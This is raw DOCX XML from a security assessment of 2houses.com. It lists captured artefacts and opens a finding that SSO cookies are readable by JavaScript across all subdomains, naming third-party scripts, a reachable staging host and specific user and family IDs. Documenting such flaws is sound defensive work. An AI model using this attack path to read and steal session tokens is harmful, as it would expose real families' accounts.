      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>browser-sessions/screens/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — screenshots during the walk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>bundles/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — static JS/CSS + source maps from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>bundles/_static-pages/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 28 unauth HTML captures of public pages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>api/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — endpoint / config / integration / framework / forms / CSP analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>osint/02-subdomains.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — subdomain inventory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>scripts/capture_har.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — re-runnable capture script (env-var creds, gitignored)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>har/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>browser-sessions/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are gitignored. Credentials were provided by env var and are not stored anywhere.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Appendix — individual findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>FINDING-001 — Plaintext user context cookies with cross-subdomain scope, no HttpOnly, no SameSite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> High  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Category:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Broken access control / information disclosure / XSS impact amplification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tools.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (and by cross-domain scope, the whole </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>*.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> family)  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Status:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Confirmed from HAR capture 2026-04-22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When a user authenticates through </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and lands on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>tools.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, the server sets the following cookies (verbatim from HAR):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="170"/>
        <w:shd w:val="clear" w:fill="F5F5F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Set-Cookie: current_user_id=&lt;userid&gt;; path=/; secure</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Set-Cookie: current_user_email=&lt;url-encoded email&gt;; path=/; secure</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Set-Cookie: current_family_id=&lt;familyid&gt;; domain=2houses.com; path=/; secure</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Set-Cookie: single_sign_on_token=&lt;token&gt;; domain=2houses.com; path=/; expires=&lt;1 year&gt;; secure</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Set-Cookie: single_sign_on_hash=&lt;hash&gt;; domain=2houses.com; path=/; expires=&lt;1 year&gt;; secure</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">None of the five cookies have the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag. None have </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Three of them (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>current_family_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>single_sign_on_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>single_sign_on_hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>domain=2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which makes them readable from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>every subdomain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of 2houses.com — including third-party-served blog posts (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>blog.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), marketing pages (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>www.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), and any future / forgotten subdomain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">For comparison, the same host correctly sets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>_onehouse_session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the actual Rails session cookie) with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>HttpOnly; Secure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Why this is a problem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>JS readability of SSO tokens.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>single_sign_on_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>single_sign_on_hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are the cross-domain SSO primitive — any JavaScript on any 2houses subdomain can read them via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and exfiltrate them. That includes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A stored XSS on the blog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A compromised third-party script (Mouseflow, Mixpanel, Intercom, Facebook Pixel, Axeptio, Stripe, Twitter — all confirmed loaded in the HAR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Any iframe widget on any subdomain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A compromised dev / staging subdomain (and we confirmed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts-staging.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is reachable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>User ID / family ID exposed to JS.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>current_user_id=340629</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>current_family_id=186758</w:t>
      </w:r>
      <w:r>
        <w:rPr>
